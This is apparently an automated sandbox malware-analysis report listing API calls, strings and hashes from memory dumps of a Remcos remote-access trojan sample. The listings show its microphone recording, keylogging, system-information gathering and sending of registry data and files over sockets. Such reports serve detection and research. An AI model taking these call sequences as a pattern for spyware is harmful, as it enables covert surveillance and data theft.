                                                                                  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                • String ID: @Ej$`i$p[G$>G$>G
                                                                                • API String ID: 1596592924-727027245
                                                                                • Opcode ID: 09dd6f417f069e8ed8ecd5ad6d96cd9979ca59fa008c26f0b929756245c9fa86
                                                                                • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                                                • Opcode Fuzzy Hash: 09dd6f417f069e8ed8ecd5ad6d96cd9979ca59fa008c26f0b929756245c9fa86
                                                                                • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                                                APIs
                                                                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CreateDeleteExecuteShellSleep
                                                                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                • API String ID: 1462127192-2001430897
                                                                                • Opcode ID: 2bb4d90de0affc035aef4a41157309109bec975f88e9ed3d6ac6d43f2603e6ee
                                                                                • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                                                • Opcode Fuzzy Hash: 2bb4d90de0affc035aef4a41157309109bec975f88e9ed3d6ac6d43f2603e6ee
                                                                                • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 0079718B
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00797194
                                                                                • DeleteFileA.KERNEL32(00000000), ref: 007971A3
                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 00797157
                                                                                  • Part of subcall function 007846CF: send.WS2_32(?,00000000,00000000,00000000), ref: 00784764
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                • String ID: <$@$@FG$TUF
                                                                                • API String ID: 1107811701-3349172182
                                                                                • Opcode ID: b36bc87eb4507af4992a544fbd13103342267bc18c2cc7e8b00c7cda52f17d37
                                                                                • Instruction ID: 9b02d7f07c480ea233464e0b5e7a177df9a104a00d35065e1d943c52fe9e99c6
                                                                                • Opcode Fuzzy Hash: b36bc87eb4507af4992a544fbd13103342267bc18c2cc7e8b00c7cda52f17d37
                                                                                • Instruction Fuzzy Hash: 8E318F31D80209DBCF19FBA4DC5EAEE7734AF50351F104169F506A60E2EF785A8ACB90
                                                                                APIs
                                                                                • _strftime.LIBCMT ref: 00401AD3
                                                                                  • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                • API String ID: 3809562944-3643129801
                                                                                • Opcode ID: ede8590fc8086e975146c5212d36a2775eef56bc05a02da711b3603456504e00
                                                                                • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                                                • Opcode Fuzzy Hash: ede8590fc8086e975146c5212d36a2775eef56bc05a02da711b3603456504e00
                                                                                • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                                                APIs
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                • waveInStart.WINMM ref: 00401A81
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                • String ID: XCG$`=G$x=G
                                                                                • API String ID: 1356121797-903574159
                                                                                • Opcode ID: df66b5dce40286873da021395106849cc9c08a1aee5ad096444ea0181d895aab
                                                                                • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                                                • Opcode Fuzzy Hash: df66b5dce40286873da021395106849cc9c08a1aee5ad096444ea0181d895aab
                                                                                • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                APIs
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00781BE2
                                                                                • waveInOpen.WINMM(00471AF8,000000FF,00471B00,00401A8E,00000000,00000000,00000024), ref: 00781C78
                                                                                • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00781CCD
                                                                                • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00781CDC
                                                                                • waveInStart.WINMM ref: 00781CE8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                • String ID: XCG$`=G$x=G
                                                                                • API String ID: 1356121797-903574159
                                                                                • Opcode ID: 4fec801bf293db6df151fde61eeb5f786b1727cfb1468d64e42c9e242be372bd
                                                                                • Instruction ID: 093c2fadb85cdcdcc31d40dd9181f95da632ff02148359bb238c145ed9fafe4f
                                                                                • Opcode Fuzzy Hash: 4fec801bf293db6df151fde61eeb5f786b1727cfb1468d64e42c9e242be372bd
                                                                                • Instruction Fuzzy Hash: 93216231A41301DBC714DF6DBD1995A7BA9FB84752B00943AF11DD76B1EB789481CB0C
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                                                  • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                  • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                  • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                                                • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                                                • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                                                • TranslateMessage.USER32(?), ref: 0041C9FB
                                                                                • DispatchMessageA.USER32(?), ref: 0041CA05
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                • String ID: Remcos
                                                                                • API String ID: 1970332568-165870891
                                                                                • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                                                • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fcc2c2816786db3331fe4fa4cc48332b155136c474820dd8e562c8cdfa0ddddc
                                                                                • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                                                • Opcode Fuzzy Hash: fcc2c2816786db3331fe4fa4cc48332b155136c474820dd8e562c8cdfa0ddddc
                                                                                • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b50f87e948356266a42ac280b2451f101745a062afa0556d4abdae292072cfe6
                                                                                • Instruction ID: 334901b5c5796fba8a1c91174548f6052ef51c08e333633c204c72b3cde25bef
                                                                                • Opcode Fuzzy Hash: b50f87e948356266a42ac280b2451f101745a062afa0556d4abdae292072cfe6
                                                                                • Instruction Fuzzy Hash: 26C1CF70E04249EFCF119FA8D886FADBBB5AF4A310F14409DF945A7392C739A941CB61
                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(?,?), ref: 00452BD6
                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452C59
                                                                                • __alloca_probe_16.LIBCMT ref: 00452C91
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452CEC
                                                                                • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452D03
                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452D7F
                                                                                • __freea.LIBCMT ref: 00452DAA
                                                                                • __freea.LIBCMT ref: 00452DB6
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                • String ID:
                                                                                • API String ID: 201697637-0
                                                                                • Opcode ID: 9bbe35462230cfd41bb5c244eb617c21ab0dbbd99226abfb5f91c2ba7bf60e7b
                                                                                • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                                                • Opcode Fuzzy Hash: 9bbe35462230cfd41bb5c244eb617c21ab0dbbd99226abfb5f91c2ba7bf60e7b
                                                                                • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: 5328bd0f7edc37ac40c0d0f8fad2384ac8a9632e9013bb03371bda9eca2e0847
                                                                                • Instruction ID: 899da670d840596b7d229093b23d5308c2da1bded6ac250041ec474cb7edb242
                                                                                • Opcode Fuzzy Hash: 5328bd0f7edc37ac40c0d0f8fad2384ac8a9632e9013bb03371bda9eca2e0847
                                                                                • Instruction Fuzzy Hash: D851B131A00685CFCB15DB78D841BEEBBF2FF08304F14016DE895AB252D67AAD85DB50
                                                                                APIs
                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                                • _free.LIBCMT ref: 00444714
                                                                                • _free.LIBCMT ref: 0044472D
                                                                                • _free.LIBCMT ref: 0044475F
                                                                                • _free.LIBCMT ref: 00444768
                                                                                • _free.LIBCMT ref: 00444774
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                                                • String ID: C
                                                                                • API String ID: 1679612858-1037565863
                                                                                • Opcode ID: 769349a79ca56dd22effc8d38738ceed36357cc24475ad69f0db2214bad425b5
                                                                                • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                                                • Opcode Fuzzy Hash: 769349a79ca56dd22effc8d38738ceed36357cc24475ad69f0db2214bad425b5
                                                                                • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                                                APIs
                                                                                  • Part of subcall function 007C7126: GetLastError.KERNEL32(?,007BE4C7,007B9583,007BE4C7,00475B70,?,007BBBBC,FF8BC35D,00475B70,00473EE8), ref: 007C712A
                                                                                  • Part of subcall function 007C7126: _free.LIBCMT ref: 007C715D
                                                                                  • Part of subcall function 007C7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 007C719E
                                                                                  • Part of subcall function 007C7126: _abort.LIBCMT ref: 007C71A4
                                                                                • _memcmp.LIBVCRUNTIME ref: 007C490A
                                                                                • _free.LIBCMT ref: 007C497B
                                                                                • _free.LIBCMT ref: 007C4994
                                                                                • _free.LIBCMT ref: 007C49C6
                                                                                • _free.LIBCMT ref: 007C49CF
                                                                                • _free.LIBCMT ref: 007C49DB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                                                • String ID: C
                                                                                • API String ID: 1679612858-1037565863
                                                                                • Opcode ID: 073fed261fa285cd6c65459185357f93b396e03b6829dbcf8ce3010cb8f635a5
                                                                                • Instruction ID: c6ca6fedc64b347e1f2931445fa2dd4a623fbd2659294e32506ca6b398be429a
                                                                                • Opcode Fuzzy Hash: 073fed261fa285cd6c65459185357f93b396e03b6829dbcf8ce3010cb8f635a5
                                                                                • Instruction Fuzzy Hash: 88B12875A01229DFDB24DF18C898BAEB7B4FB09304F1045AEE949A7351D735AE90CF40
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: tcp$udp
                                                                                • API String ID: 0-3725065008
                                                                                • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                                                • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID: gKE$HE$HE
                                                                                • API String ID: 269201875-2777690135
                                                                                • Opcode ID: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                                                                                • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                                • Opcode Fuzzy Hash: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                                                                                • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 00781A23
                                                                                  • Part of subcall function 007B3736: RtlEnterCriticalSection.NTDLL(00470D18), ref: 007B3740
                                                                                  • Part of subcall function 007B3736: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 007B3773
                                                                                • RtlExitUserThread.NTDLL(00000000), ref: 00781A5B
                                                                                • waveInUnprepareHeader.WINMM(00001E64,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00781B69
                                                                                  • Part of subcall function 007B3780: RtlEnterCriticalSection.NTDLL(00470D18), ref: 007B378B
                                                                                  • Part of subcall function 007B3780: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 007B37C8
                                                                                  • Part of subcall function 007B3B0C: __onexit.LIBCMT ref: 007B3B12
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepareUser__onexitwave
                                                                                • String ID: `i$p[G$>G$>G
                                                                                • API String ID: 2307665288-3362937785
                                                                                • Opcode ID: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                                                • Instruction ID: fee61b2da785b8bb42d40cfd7c13adafa38728f5ff7e0e47b8ec053a9b255d47
                                                                                • Opcode Fuzzy Hash: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                                                • Instruction Fuzzy Hash: 1D41C631684200DBC329FB28DD5EEAE7399EB80311F50452EF519961E2EF78AD47C716
                                                                                APIs
                                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00792F28
                                                                                  • Part of subcall function 00792C11: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00792C84
                                                                                  • Part of subcall function 00792C11: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00792CB3
                                                                                  • Part of subcall function 007846CF: send.WS2_32(?,00000000,00000000,00000000), ref: 00784764
                                                                                • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00793098
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEnumInfoOpenQuerysend
                                                                                • String ID: TUF$TUFTUF$>G$DG$DG
                                                                                • API String ID: 3114080316-72097156
                                                                                • Opcode ID: 09c09115532b36cedb4214abfd7c567596c85741be2dd330b3884bc25d138105
                                                                                • Instruction ID: 442b2fa5651a4b7c7f9784fa7113ad489476212af0726a7b458307d5544a885e
                                                                                • Opcode Fuzzy Hash: 09c09115532b36cedb4214abfd7c567596c85741be2dd330b3884bc25d138105
                                                                                • Instruction Fuzzy Hash: FD41C831688204DBC328F728E85EAEF73959F91311F50842EF54A97293EF2C5D0A8766
                                                                                APIs
                                                                                • GetForegroundWindow.USER32 ref: 00789DA6
                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 00789DB2
                                                                                • GetKeyboardLayout.USER32(00000000), ref: 00789DB9
                                                                                • GetKeyState.USER32(00000010), ref: 00789DC3
                                                                                • GetKeyboardState.USER32(?), ref: 00789DCE
                                                                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00789E83
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                                                                • String ID: 8[G
                                                                                • API String ID: 3566172867-1691237782
                                                                                • Opcode ID: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                                                • Instruction ID: 31cb3b930b9d7fd365adf38117c3c31e9bbc2bc4b7ea5d7d394731621fcf5ad4
                                                                                • Opcode Fuzzy Hash: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                                                • Instruction Fuzzy Hash: 5F318172544308AFD710DF90DC85FEB7BECEB48711F00083ABA45961A1D7B5E548DBA2
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                  • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                  • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                • String ID: .part
                                                                                • API String ID: 1303771098-3499674018
